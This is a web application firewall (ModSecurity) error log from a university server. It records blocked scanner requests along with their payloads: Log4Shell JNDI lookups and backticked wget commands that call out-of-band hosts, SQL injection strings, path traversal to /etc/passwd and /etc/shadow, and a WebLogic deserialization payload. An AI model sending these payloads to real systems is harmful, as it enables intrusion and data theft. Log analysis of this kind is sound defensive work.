[Tue Aug 29 11:34:10.307956 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:username: admin cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/cgi-bin/weblogin.cgi"] [unique_id "ZO11QsCo-f0AAAShCVcAAAAi"]
[Tue Aug 29 11:34:10.307956 2023] [:error] [pid 1171] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:PK\\x03\\x04\\x14\\x00\\b\\x00\\b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x00\\x00\\x00../../../../ found within ARGS:PK\\x5cx03\\x5cx04\\x5cx14\\x5cx00\\x5cb\\x5cx00\\x5cb\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00\\x5cx00: \\x00\\x00\\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\\x1c\\xc8\\xbd\\x0a\\xc20\\x10\\x00\\xe0\\xbdOQ\\x02\\x85\\x04!(\\xb8U\\x5c\\xfc[\\xc4\\x16;\\xb4t;\\xdbCS\\xcf$\\xc6K\\xf4\\xf1E\\xd7oUd.\\xb2\\xf6\\xc1X"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/service/extension/backup/mboximport"] [unique_id "ZO11QsCo-f0AAAST5AUAAAAZ"]
[Tue Aug 29 11:34:10.340252 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:x: ${jndi:ldap://${:-178}${:-654}.${hostName}.uri.cjmn8l5jmimk2adbbnlg15y8nithg7cwm.oast.site/a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO11QsCo-f0AAARQ4GMAAAAB"]
[Tue Aug 29 11:34:11.360800 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:company_id[1][0]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))) --  found within ARGS:company_id[1][0]: test\\x22) and extractvalue(1,concat(0x7e,md5(999999999))) -- a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11Q8Co-f0AAASHh6gAAAAD"]
[Tue Aug 29 11:34:11.405394 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:${jndi:ldap://${:-178}${:-654}.${hostName}.cookiename.cjmn8l5jmimk2adbbnlggmi6i5zr9zk9n.oast.site}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within REQUEST_COOKIES:${jndi:ldap://${:-178}${:-654}.${hostName}.cookiename.cjmn8l5jmimk2adbbnlggmi6i5zr9zk9n.oast.site}: ${jndi:ldap://${:-178}${:-654}.${hostName}.cookievalue.cjmn8l5jmimk2adbbnlg4a1ddrfxhkiir.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO11Q8Co-f0AAASEJTYAAAAE"]
[Tue Aug 29 11:34:12.419996 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sort. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))) --  found within ARGS:sort: 1 and extractvalue(1,concat(0x7e,md5(999999999))) -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/api.php"] [unique_id "ZO11RMCo-f0AAARQ4HAAAAAB"]
[Tue Aug 29 11:34:13.317428 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:userIdentifiers. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union(select found within ARGS:userIdentifiers: -1)union(select(3),null,null,null,null,null,str(98989*44313),null"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/mobile/plugin/SyncUserInfo.jsp"] [unique_id "ZO11RcCo-f0AAASS7@QAAAAY"]
[Tue Aug 29 11:34:15.343784 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgr3rytmwxfpb8q.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgr3rytmwxfpb8q.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/ui/vcav-bootstrap/rest/vcav-providers/provider-logo"] [unique_id "ZO11R8Co-f0AAAPLwHAAAAAX"]
[Tue Aug 29 11:34:15.347774 2023] [:error] [pid 1173] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:i_like_gogits. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:i_like_gogits: ../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO11R8Co-f0AAASVoIgAAAAe"]
[Tue Aug 29 11:34:16.352720 2023] [:error] [pid 1173] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "digilibfh.unla.ac.id"] [uri "/getcfg.php"] [unique_id "ZO11SMCo-f0AAASVoIsAAAAe"]
[Tue Aug 29 11:34:16.352749 2023] [:error] [pid 1173] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "digilibfh.unla.ac.id"] [uri "/getcfg.php"] [unique_id "ZO11SMCo-f0AAASVoIsAAAAe"]
[Tue Aug 29 11:34:16.363040 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://example.com/?x&v=1%22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%23 found within TX:1: example.com/?x&v=1%22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%23"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11SMCo-f0AAASI0B8AAAAG"]
[Tue Aug 29 11:34:16.384220 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:i_like_gogits. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:i_like_gogits: ../../../../etc/dummy"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO11SMCo-f0AAASK4fwAAAAI"]
[Tue Aug 29 11:34:17.323276 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/shadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/crowd/plugins/servlet/exp"] [unique_id "ZO11ScCo-f0AAAShCW0AAAAi"]
[Tue Aug 29 11:34:19.299516 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:json. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: {\\x22\\xf0\\x9f\\xa6\\x9e\\x22:\\x22 found within ARGS:json: {\\x22\\xf0\\x9f\\xa6\\x9e\\x22:\\x22test\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/userportal/Controller"] [unique_id "ZO11S8Co-f0AAAShCXkAAAAi"]
[Tue Aug 29 11:34:19.357062 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'uqzM'='uqzM found within ARGS:email: 2UdxlnvuySJpqs8tqGtER6xDqNl@gmail.com' AND (SELECT 2549 FROM (SELECT(SLEEP(6)))LIzI) AND 'uqzM'='uqzM"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/admin/login.php"] [unique_id "ZO11S8Co-f0AAARdiQ4AAAAK"]
[Tue Aug 29 11:34:19.412157 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-454}${:-171}.${hostName}.username.cjmn8l5jmimk2adbbnlgyg5n4cy7zsnnx.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/login"] [unique_id "ZO11S8Co-f0AAASI0CoAAAAG"]
[Tue Aug 29 11:34:23.574751 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ping_ipaddr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ping_ipaddr: 127.0.0.1 cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/apply_sec.cgi"] [unique_id "ZO11T8Co-f0AAASK4g4AAAAI"]
[Tue Aug 29 11:34:23.614543 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:profileIdx2. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()), found within ARGS:profileIdx2: updatexml(0,concat(0xa,user()),0)::"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/jsrpc.php"] [unique_id "ZO11T8Co-f0AAASK4hAAAAAI"]
[Tue Aug 29 11:34:25.431545 2023] [:error] [pid 1249] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: : found within ARGS_NAMES:{\\x22id\\x22: 1, \\x22method\\x22: \\x22global.login\\x22, \\x22params\\x22: {\\x22authorityType\\x22: \\x22Default\\x22, \\x22clientType\\x22: \\x22NetKeyboard\\x22, \\x22loginType\\x22: \\x22Direct\\x22, \\x22password\\x22: \\x22Not Used\\x22, \\x22passwordType\\x22: \\x22Default\\x22, \\x22userName\\x22: \\x22admin\\x22}, \\x22session\\x22: 0}: {\\x22id\\x22: 1, [hostname "digilibfh.unla.ac.id"] [uri "/RPC2_Login"] [unique_id "ZO11UcCo-f0AAAThz-YAAAAm"]
[Tue Aug 29 11:34:26.164298 2023] [:error] [pid 1265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/hms/doctor/"] [unique_id "ZO11UsCo-f0AAATxvW0AAAAw"]
[Tue Aug 29 11:34:26.334113 2023] [:error] [pid 1305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: xor found within XML: xxxxorg.slf4j.ext.EventData<java><void class=\\x22sun.misc.BASE64Decoder\\x22><void method=\\x22decodeBuffer\\x22 id=\\x22byte_arr\\x22><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9..."] [severity "CRITICAL"] [hostname "digilibfh.unla.ac.id"] [uri "/wls-wsat/CoordinatorPortType"] [unique_id "ZO11UsCo-f0AAAUZcEAAAABO"]
[Tue Aug 29 11:34:26.337172 2023] [:error] [pid 1288] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:data[0][host]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:data[0][host]: `/bin/wget http:/cjmn8l5jmimk2adbbnlgfbn7q35niykqg.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/Collector/storagemgmt/apply"] [unique_id "ZO11UsCo-f0AAAUIz6AAAABA"]
[Tue Aug 29 11:34:27.846933 2023] [:error] [pid 1306] [client 143.42.78.27] ModSecurity: Request body no files data length is larger than the configured limit (131072).. Deny with code (413) [hostname "digilibfh.unla.ac.id"] [uri "/_async/AsyncResponseService"] [unique_id "ZO11U8Co-f0AAAUa3BAAAABP"]
[Tue Aug 29 11:34:29.324939 2023] [:error] [pid 1287] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:../../../../etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:../../../../etc/passwd: ../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfh.unla.ac.id"] [uri "/blast/nph-viewgif.cgi"] [unique_id "ZO11VcCo-f0AAAUHKKQAAAA-"]
[Tue Aug 29 11:34:29.335050 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-467}${:-284}.${hostName}.username.cjmn8l5jmimk2adbbnlgar7p4npgh3ydk.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/"] [unique_id "ZO11VcCo-f0AAAUbgzcAAABQ"]
[Tue Aug 29 11:34:29.403107 2023] [:error] [pid 1253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:what. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ){   found within ARGS:what: function(x){  return(system(paste('id'), intern = T))}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/ocpu/library/base/R/do.call/json"] [unique_id "ZO11VcCo-f0AAATlLDsAAAAq"]
[Tue Aug 29 11:34:29.508005 2023] [:error] [pid 1303] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:a. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:a: ${jndi:ldap://${:-334}${:-600}.${hostName}.search.cjmn8l5jmimk2adbbnlgkk6iph9mdtdz1.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/_search"] [unique_id "ZO11VcCo-f0AAAUXLhYAAABM"]
[Tue Aug 29 11:34:30.387229 2023] [:error] [pid 1237] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:target_addr. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:target_addr: \\x221.1.1.1 `wget http:/cjmn8l5jmimk2adbbnlgnp8ghh66cpm67.oast.site/`\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/boaform/admin/formTracert"] [unique_id "ZO11VsCo-f0AAATVtRcAAAAZ"]
[Tue Aug 29 11:34:31.427910 2023] [:error] [pid 1239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subWidgets[0][config][code]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:subWidgets[0][config][code]: echo md5(\\x22CVE-2019-16759\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/ajax/render/widget_tabbedcontainer_tab_panel"] [unique_id "ZO11V8Co-f0AAATXLKUAAAAb"]
